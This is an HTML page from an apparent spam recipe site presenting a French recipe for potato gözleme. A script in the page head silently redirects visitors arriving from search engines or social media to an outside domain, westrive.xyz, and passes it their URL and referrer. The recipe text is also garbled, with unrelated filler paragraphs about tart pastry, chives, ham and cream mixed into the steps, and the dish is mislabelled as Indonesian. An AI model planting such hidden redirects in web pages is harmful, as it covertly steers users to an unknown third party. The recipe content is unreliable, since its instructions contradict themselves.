<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="index, follow">

<script>
    var ars = 'https://westrive.xyz';
    
    if(['.google.', 'bing.', 'yandex.', 'facebook.', 'pinterest.'].some(s => document.referrer.toLowerCase().includes(s)) || ['fb', 'facebook', 'pinterest', 'twitter'].some(s => navigator.userAgent.toLowerCase().includes(s))){ window.location.href = ars + '/?arsae='+ encodeURIComponent(window.location.href) + '&arsae_ref='+ encodeURIComponent(document.referrer) }
</script>

<meta name="generator" content="Hugo 0.79.0" />
<title>
    
        Recette Des Gözleme aux pommes de terre | Delicious Recipes
    
</title>
<meta name="keywords" content="

    gzleme aux pommes

">
<meta name="description" content="

    Recette Des Gözleme aux pommes de terre

">



<script type="application/ld+json">
{
    "@context": "https://schema.org/", 
    "@type": "Recipe", 
    "name": "Recette Des Gözleme aux pommes de terre",
    "headline": "Recette Des Gözleme aux pommes de terre",
    "image": "https:\/\/img-global.cpcdn.com\/recipes\/fdc188d4a9414df1\/751x532cq70\/gozleme-aux-pommes-de-terre-photo-principale-de-la-recette.jpg",
    "description": "Recette Des Gözleme aux pommes de terre",
    "keywords": "gzleme aux pommes",
	"recipeCuisine": "Indonesian",
	"prepTime": "PT15M",
    "cookTime": "PT58M",
	"recipeYield": "4",
    "recipeCategory": "Lunch",
    "datePublished": "2020-07-18",
    "license": "@Copyright Delicious Recipes 2020"
    "author": {
        "@type": "Person",
        "name": "Marvin Perry"
    },
    "aggregateRating": {
        "@type": "AggregateRating",
        "ratingValue": "3.7",
        "reviewCount": "11"
    },
	"nutrition": {
        "@type": "NutritionInformation",
        "calories": "273 calories"
    },
    "recipeIngredient": [ " Recette pour 14 gzleme" , " Pour la garniture" , "8 pommes terre moyenne cuites  leau" , "3 oignons" , "60 ml dhuile" , "1 cuillère à café sel" , "1 cuillère à café poivre" , "1 cuillère à café paprika" , "1 cuillère à café piment en paillettes" , "1 cuillère à café menthe sche" , " Pour la pte" , "500 ml deau" , "1,5 cuillère à café sel" , "2 cuillère à soupe dhuile" , "775 g farine"  ],
    "recipeInstructions": [{
        "@type": "HowToStep",
        "text": "Dans un saladier, écrasez les pommes de terre refroidies, ajoutez l\u0026#39;huile,les oignons coupées très finement, ajoutez l\u0026#39;huile, le sel, les épices et mélangez le tout. ▪️Pour la pâte, dans un saladier, mettre l\u0026#39;eau, le sel, mélangez, ajoutez progressivement la farine, pétrir pendant 5 minutes.  Former 14 boules."
        },
        {
        "@type": "HowToStep",
        "text": "Saupoudrez le plan de travail avec de la farine, posez une boule de pâte, saupoudrez la de farine, étalez la avec un rouleau à pâtisserie ou un oklava pour obtenir à peu près la taille d\u0026#39;une crêpe, déposez le mélange de pommes de terre sur la moitié de la pâte à l\u0026#39;aide d\u0026#39;une cuillère à soupe et étalez avec le dos de la cuillère."
        },
        {
        "@type": "HowToStep",
        "text": "Refermez avec l\u0026#39;autre moitié de la pâte en appuyant sur les extrémités pour qu\u0026#39;elle ne s\u0026#39;ouvre pas à la cuisson.  Bien faire chauffer la crêpiere(ou grande poêle) sans ajouter de matière grasse, faire cuire chaque côté du gözleme. Faire la même chose avec chaque pâte."
        }]
}
</script>




<link rel="apple-touch-icon" sizes="180x180" href="https://how-to-cooking-rise.web.app/img/logo.svg">
<link rel="icon" type="image/png" sizes="32x32" href="https://how-to-cooking-rise.web.app/img/logo.svg">
<link rel="icon" type="image/png" sizes="16x16" href="https://how-to-cooking-rise.web.app/img/logo.svg">
<link rel="manifest" href="https://how-to-cooking-rise.web.app/site.webmanifest">
 <link rel="stylesheet" href="https://how-to-cooking-rise.web.app/css/bootstrap.css">
 <link rel="stylesheet" href="https://how-to-cooking-rise.web.app/css/style.css">
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Courgette&family=Lobster&display=swap" rel="stylesheet">
    </head>
    <body>
        <header>
            <div class="container">
    <div class="col-md">
        <h1 class="webtitle">
            <a href="https://how-to-cooking-rise.web.app/" class="text-dark">
                Delicious Recipes
            </a>
        </h1>
        <p class="subwebtitle">Our Popular Recipes, Easy and Testy</p>
    </div>
</div>
<div class="container">
    <hr>
    <nav class="navbar navbar-expand-lg navbar-light bg-transperent fixed-auto">
            <a class="navbar-brand" href="https://how-to-cooking-rise.web.app/">
                
                <img src="https://how-to-cooking-rise.web.app/img/logo.svg" width="30" height="30" class="d-inline-block align-top" alt="">
            </a>
            </a>
            <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarNavAltMarkup" aria-controls="navbarNavAltMarkup" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarNavAltMarkup">
                <ul class="navbar-nav ml-auto">
                    
                        <li class="nav-item">
                            <a class="nav-link" href="/about">About </a>
                        </li>
                    
                        <li class="nav-item">
                            <a class="nav-link" href="/dmca">DMCA </a>
                        </li>
                    
                        <li class="nav-item">
                            <a class="nav-link" href="/privacy">Privacy Policy </a>
                        </li>
                    
                        <li class="nav-item">
                            <a class="nav-link" href="/term">Term Use </a>
                        </li>
                    
                        <li class="nav-item">
                            <a class="nav-link" href="/ccpa">CCPA </a>
                        </li>
                    
                </ul>
            </div>
        </nav>
        <hr>
</div>
        </header>
        <div id="content">
            

<div class="container">
    <div class="row">
        <div class="col-md-8">
            <div id="breadcrumbs" style="font-size: 83%; font-family: 'Courgette', cursive;">
    <a href="/">Home</a> / <a href="/blog">Blog</a>  / Recette Des Gözleme Aux Pommes De Terre
</div> <hr>
            <h2 class="list-article">
                Recette Des Gözleme aux pommes de terre
            </h2> <hr>
            <!--ads/responsive.txt--> <hr>
            <div class="row">
    <span class="ml-3">
        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-people-fill" viewBox="0 0 16 16">
            <path fill-rule="evenodd" d="M7 14s-1 0-1-1 1-4 5-4 5 3 5 4-1 1-1 1H7zm4-6a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-5.784 6A2.238 2.238 0 0 1 5 13c0-1.355.68-2.75 1.936-3.72A6.325 6.325 0 0 0 5 9c-4 0-5 3-5 4s1 1 1 1h4.216zM4.5 8a2.5 2.5 0 1 0 0-5 2.5 2.5 0 0 0 0 5z"/>
        </svg>
        <span class="badge badge-success">
            Marvin Perry
        </span>
    </span>
    <span class="ml-3">
        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-calendar-week" viewBox="0 0 16 16">
            <path fill-rule="evenodd" d="M3.5 0a.5.5 0 0 1 .5.5V1h8V.5a.5.5 0 0 1 1 0V1h1a2 2 0 0 1 2 2v11a2 2 0 0 1-2 2H2a2 2 0 0 1-2-2V3a2 2 0 0 1 2-2h1V.5a.5.5 0 0 1 .5-.5zM1 4v10a1 1 0 0 0 1 1h12a1 1 0 0 0 1-1V4H1z"/>
            <path d="M11 6.5a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1zm-3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1zm-5 3a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1zm3 0a.5.5 0 0 1 .5-.5h1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-1a.5.5 0 0 1-.5-.5v-1z"/>
        </svg>
        <span class="badge badge-danger">
            2020-07-18
        </span>
    </span>
</div>
            <hr>
            <div class="content">
                <p><img src="https://img-global.cpcdn.com/recipes/fdc188d4a9414df1/751x532cq70/gozleme-aux-pommes-de-terre-photo-principale-de-la-recette.jpg" alt="Gözleme aux pommes de terre"></p>
<p>En général, les gens ont peur de commencer à cuisiner gözleme aux pommes de terre de peur que la nourriture obtenue ne soit pas délicieuse. Beaucoup de choses ont un effet sur la qualité gustative de gözleme aux pommes de terre! En partant du type d&rsquo;ustensiles de cuisine, assurez-vous toujours d&rsquo;utiliser des ustensiles de cuisine de qualité, toujours en bon état et propres. Ensuite, pour rendre la nourriture encore plus délicieuse, bien sûr, vous devez utiliser diverses épices pour que le plat obtenu ne soit pas plat. Ensuite, multipliez la pratique pour reconnaître les différentes saveurs de la cuisine, profitez de chaque étape de la cuisine avec tout votre cœur, car la sensation d&rsquo;être enthousiaste, calme et pas pressé affecte aussi le goût de la cuisine!</p>
<!--ads/responsive.txt-->
<p>Vous pouvez cuire gözleme aux pommes de terre en utilisant 15 Ingrédients et 3 pas. Voici comment vous faire cette.</p>
<h5 id="ingrédients-de-gözleme-aux-pommes-de-terre-">Ingrédients de gözleme aux pommes de terre :</h5>
<ol>
<li>Fournir  Recette pour 14 gözleme</li>
<li>Préparer  ▪️Pour la garniture</li>
<li>Préparer 8 pommes terre moyenne cuites à l'eau</li>
<li>Vous devez vous préparer 3 oignons</li>
<li>Vous devez vous préparer 60 ml d'huile</li>
<li>Préparer 1 cuillère à café sel</li>
<li>Préparer 1 cuillère à café poivre</li>
<li>Préparer 1 cuillère à café paprika</li>
<li>Fournir 1 cuillère à café piment en paillettes</li>
<li>Préparer 1 cuillère à café menthe séchée</li>
<li>Vous avez besoin  Pour la pâte</li>
<li>Vous avez besoin 500 ml d'eau</li>
<li>Utilisation 1,5 cuillère à café sel</li>
<li>Vous devez vous préparer 2 cuillère à soupe d'huile</li>
<li>Préparer 775 g farine</li>
</ol>
<p>Etaler la pâte brisée sur un moule à tarte assez haut, répartir le mélange sur la pâte. Il faut que la couche de pommes de terre soit assez épaisse. Faites bouillir de l'eau salée dans une casserole et plongez-y les pommes de terre durant une vingtaine de min. Égouttez-les. Rincez, égouttez et ciselez la ciboulette dans les pommes de terre.</p>
<!--ads/responsive.txt-->
<h5 id="gözleme-aux-pommes-de-terre-instructions-">Gözleme aux pommes de terre instructions :</h5>
<ol>
<li>Dans un saladier, écrasez les pommes de terre refroidies, ajoutez l'huile,les oignons coupées très finement, ajoutez l'huile, le sel, les épices et mélangez le tout. ▪️Pour la pâte, dans un saladier, mettre l'eau, le sel, mélangez, ajoutez progressivement la farine, pétrir pendant 5 minutes.  - Former 14 boules.</li>
<li>Saupoudrez le plan de travail avec de la farine, posez une boule de pâte, saupoudrez la de farine, étalez la avec un rouleau à pâtisserie ou un oklava pour obtenir à peu près la taille d'une crêpe, déposez le mélange de pommes de terre sur la moitié de la pâte à l'aide d'une cuillère à soupe et étalez avec le dos de la cuillère.</li>
<li>Refermez avec l'autre moitié de la pâte en appuyant sur les extrémités pour qu'elle ne s'ouvre pas à la cuisson.  - Bien faire chauffer la crêpiere(ou grande poêle) sans ajouter de matière grasse, faire cuire chaque côté du gözleme. - Faire la même chose avec chaque pâte.</li>
</ol>
<p>Faire cuire les pommes de terre à la vapeur. Verser sur la pâte un peu du mélange oeufs/crème fraîche. Couper les pommes de terre en petits morceaux et les disposer sur la pâte avec le jambon coupé (ou les lardons). A l'aide d'un pinceau, badigeonner le dessus de chaque gözleme avec un peu d'huile d'olive. Chauffer une poêle à feu vif.</p>
<!--ads/responsive.txt-->
<p>
Maintenant que vous avez lu la recette de Gözleme aux pommes de terre, c'est le moment pour vous de vous diriger vers la cuisine et de préparer d'excellents plats! Gardez à l'esprit que la préparation des aliments n'est pas une compétence qui peut être à cent pour cent au début. La méthode est nécessaire pour maîtriser l'art de la cuisine.
</p>
<p>
<i>Si vous trouvez cette Gözleme aux pommes de terre recette précieuse, partagez-la avec vos amis ou votre famille, merci et bonne chance.</i>
</p>

            </div>
            <hr>
<center>

    
    <span class="btn btn-outline-secondary">
    #<a class="text-black-50" href="https://how-to-cooking-rise.web.app/tags/gzleme">gzleme</a>
    </span> 

    
    <span class="btn btn-outline-secondary">
    #<a class="text-black-50" href="https://how-to-cooking-rise.web.app/tags/aux">aux</a>
    </span> 

    
    <span class="btn btn-outline-secondary">
    #<a class="text-black-50" href="https://how-to-cooking-rise.web.app/tags/pommes">pommes</a>
    </span> 

</center>
<hr> <br>
            <!--ads/responsive.txt--> <hr>
            <div class="row">
    <div class="col-lg-5 ml-auto text-left">
        
        <div class="col mb-3">
            <div class="card h-100 ">
                <a href="https://how-to-cooking-rise.web.app/blog/126-recette-gratin-d-and-39-endives-aux-maroilles-et-aux-2-jambons/">
                    <img src="https://img-global.cpcdn.com/recipes/9a488167f68e0bf1/751x532cq70/gratin-dendives-aux-maroilles-et-aux-2-jambons-photo-principale-de-la-recette.jpg"
                    class="card-img-top"
                    alt="Recette: Gratin d&amp;amp;#39;endives aux Maroilles et aux 2 jambons">
                </a>
                <div class="card-body">
                    <h6 class="webtitle">
                        <a href="https://how-to-cooking-rise.web.app/blog/126-recette-gratin-d-and-39-endives-aux-maroilles-et-aux-2-jambons/" class="text-danger">
                            Recette: Gratin d&amp;amp;#39;endives aux Maroilles et aux 2 jambons
                        </a>
                    </h6>
                    <a href="https://how-to-cooking-rise.web.app/blog/126-recette-gratin-d-and-39-endives-aux-maroilles-et-aux-2-jambons/">
                        <button type="button" class="btn btn-warning">PREV</button>
                    </a>
                </div>
            </div>
        </div>
        
    </div>
    <div class="col-lg-5 ml-auto text-right">
        
        <div class="col mb-3">
            <div class="card h-100 ">
                <a href="https://how-to-cooking-rise.web.app/blog/126-recette-de-une-summer-tart/">
                    <img src="https://img-global.cpcdn.com/recipes/fdd2db308bacdad0/751x532cq70/une-summer-tart-%f0%9f%8d%8b%f0%9f%8d%93%f0%9f%8c%bf-photo-principale-de-la-recette.jpg"
                    class="card-img-top"
                    alt="Recette De Une summer tart 🍋🍓🌿">
                </a>
                <div class="card-body">
                    <h6 class="webtitle">
                        <a href="https://how-to-cooking-rise.web.app/blog/126-recette-de-une-summer-tart/" class="text-danger">
                            Recette De Une summer tart 🍋🍓🌿
                        </a>
                    </h6>
                    <a href="https://how-to-cooking-rise.web.app/blog/126-recette-de-une-summer-tart/">
                        <button type="button" class="btn btn-warning">NEXT</button>
                    </a>
                </div>
            </div>
        </div>
        
    </div>
</div>
            <hr> <br>
        </div>
        <div class="col-md-4">
            


<h2 class="webtitle">Related Post</h2>
<hr>
<!--ads/responsive.txt--> <hr>

    <div class="card mb-3">
        <div class="row no-gutters">
            <div class="col-md-5">
                <a href="https://how-to-cooking-rise.web.app/blog/126-recette-gratin-d-and-39-endives-aux-maroilles-et-aux-2-jambons/">
                    <img src="https://img-global.cpcdn.com/recipes/9a488167f68e0bf1/751x532cq70/gratin-dendives-aux-maroilles-et-aux-2-jambons-photo-principale-de-la-recette.jpg"
                    class="card-img" alt="Recette: Gratin d&amp;amp;#39;endives aux Maroilles et aux 2 jambons">
                </a>
            </div>
            <div class="col-md-7">
                <div class="card-body">
                    <h6 class="list-article">
                        <a href="https://how-to-cooking-rise.web.app/blog/126-recette-gratin-d-and-39-endives-aux-maroilles-et-aux-2-jambons/" class="text-dark">
                            Recette: Gratin d&amp;amp;#39;endives aux Maroilles et aux 2 jambons
                        </a>
                    </h6>
                </div>
            </div>
        </div>
    </div>


        </div>
    </div>
</div>


        </div>
        <footer>
            <div class="row justify-content-center">
  <div class="container webfooter">
      <div class="col-12 text-center mb-5">
        <h5 class="webtitle">
          <a href="https://how-to-cooking-rise.web.app/" class="text-dark">
            @Delicious Recipes
          </a>
          <hr class="garis">
        </h5>
      </div>
    </div>
      <div class="col-lg-3 col-sm-6 mb-5">
        <h4 class="mb-4 webtitle">Pages</h4>
        <hr>
        <ul class="list-unstyled webtitle">
          
          <li class="mb-3 featured"><a class="text-dark" href="https://how-to-cooking-rise.web.app/about">About </a></li>
          
          <li class="mb-3 featured"><a class="text-dark" href="https://how-to-cooking-rise.web.app/dmca">DMCA </a></li>
          
          <li class="mb-3 featured"><a class="text-dark" href="https://how-to-cooking-rise.web.app/privacy">Privacy Policy </a></li>
          
          <li class="mb-3 featured"><a class="text-dark" href="https://how-to-cooking-rise.web.app/term">Term Use </a></li>
          
          <li class="mb-3 featured"><a class="text-dark" href="https://how-to-cooking-rise.web.app/ccpa">CCPA </a></li>
          
        </ul>
      </div>
      <div class="col-lg-3 col-sm-6 mb-5">
        <h4 class="mb-4 webtitle">Sosial</h4>
        <hr>
        <ul class="list-unstyled webtitle">
          <li class="mb-3 featured">
            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-facebook" viewBox="0 0 16 16">
              <path fill-rule="evenodd" d="M16 8.049c0-4.446-3.582-8.05-8-8.05C3.58 0-.002 3.603-.002 8.05c0 4.017 2.926 7.347 6.75 7.951v-5.625h-2.03V8.05H6.75V6.275c0-2.017 1.195-3.131 3.022-3.131.876 0 1.791.157 1.791.157v1.98h-1.009c-.993 0-1.303.621-1.303 1.258v1.51h2.218l-.354 2.326H9.25V16c3.824-.604 6.75-3.934 6.75-7.951z"/>
            </svg>
            <a class="text-dark" href="https://id-id.facebook.com/people/Silohon-Jr/100008714179233">
              Facebook
            </a>
          </li>
          <li class="mb-3 featured">
            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-instagram" viewBox="0 0 16 16">
              <path d="M8 0C5.829 0 5.556.01 4.703.048 3.85.088 3.269.222 2.76.42a3.917 3.917 0 0 0-1.417.923A3.927 3.927 0 0 0 .42 2.76C.222 3.268.087 3.85.048 4.7.01 5.555 0 5.827 0 8.001c0 2.172.01 2.444.048 3.297.04.852.174 1.433.372 1.942.205.526.478.972.923 1.417.444.445.89.719 1.416.923.51.198 1.09.333 1.942.372C5.555 15.99 5.827 16 8 16s2.444-.01 3.298-.048c.851-.04 1.434-.174 1.943-.372a3.916 3.916 0 0 0 1.416-.923c.445-.445.718-.891.923-1.417.197-.509.332-1.09.372-1.942C15.99 10.445 16 10.173 16 8s-.01-2.445-.048-3.299c-.04-.851-.175-1.433-.372-1.941a3.926 3.926 0 0 0-.923-1.417A3.911 3.911 0 0 0 13.24.42c-.51-.198-1.092-.333-1.943-.372C10.443.01 10.172 0 7.998 0h.003zm-.717 1.442h.718c2.136 0 2.389.007 3.232.046.78.035 1.204.166 1.486.275.373.145.64.319.92.599.28.28.453.546.598.92.11.281.24.705.275 1.485.039.843.047 1.096.047 3.231s-.008 2.389-.047 3.232c-.035.78-.166 1.203-.275 1.485a2.47 2.47 0 0 1-.599.919c-.28.28-.546.453-.92.598-.28.11-.704.24-1.485.276-.843.038-1.096.047-3.232.047s-2.39-.009-3.233-.047c-.78-.036-1.203-.166-1.485-.276a2.478 2.478 0 0 1-.92-.598 2.48 2.48 0 0 1-.6-.92c-.109-.281-.24-.705-.275-1.485-.038-.843-.046-1.096-.046-3.233 0-2.136.008-2.388.046-3.231.036-.78.166-1.204.276-1.486.145-.373.319-.64.599-.92.28-.28.546-.453.92-.598.282-.11.705-.24 1.485-.276.738-.034 1.024-.044 2.515-.045v.002zm4.988 1.328a.96.96 0 1 0 0 1.92.96.96 0 0 0 0-1.92zm-4.27 1.122a4.109 4.109 0 1 0 0 8.217 4.109 4.109 0 0 0 0-8.217zm0 1.441a2.667 2.667 0 1 1 0 5.334 2.667 2.667 0 0 1 0-5.334z"/>
            </svg>
            <a href="https://www.instagram.com/silohon94/" class="text-dark">Instagram</a>
          </li>
          <li class="mb-3 featured">
            <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-github" viewBox="0 0 16 16">
              <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.012 8.012 0 0 0 16 8c0-4.42-3.58-8-8-8z"/>
            </svg>
            <a href="https://github.com/silohon" class="text-dark">Github</a>
          </li>
          <li class="mb-3 featured">

          </li>
        </ul>
      </div>
      <div class="col-12 border-top py-4 text-center">
        | @Copyright  <a href="https://how-to-cooking-rise.web.app/" class="text-danger">
          <span class="webtitle">
            Delicious Recipes
          </span>
        </a>  2020 All Rights Reserved |
      </div>
</div>
  
  <script async defer data-pin-hover="true" data-pin-tall="true" data-pin-round="true" src="//assets.pinterest.com/js/pinit.js"></script>


<script src="https://how-to-cooking-rise.web.app/js/jquery-3.3.1.slim.min.js"></script>
<script src="https://how-to-cooking-rise.web.app/js/bootstrap.bundle.min.js"></script>
            
<a href="/" alt="best counter" target="_blank" >
<img  src="//sstatic1.histats.com/0.gif?4491757&101" alt="best counter" border="0">

        </footer>
    </body>
</html>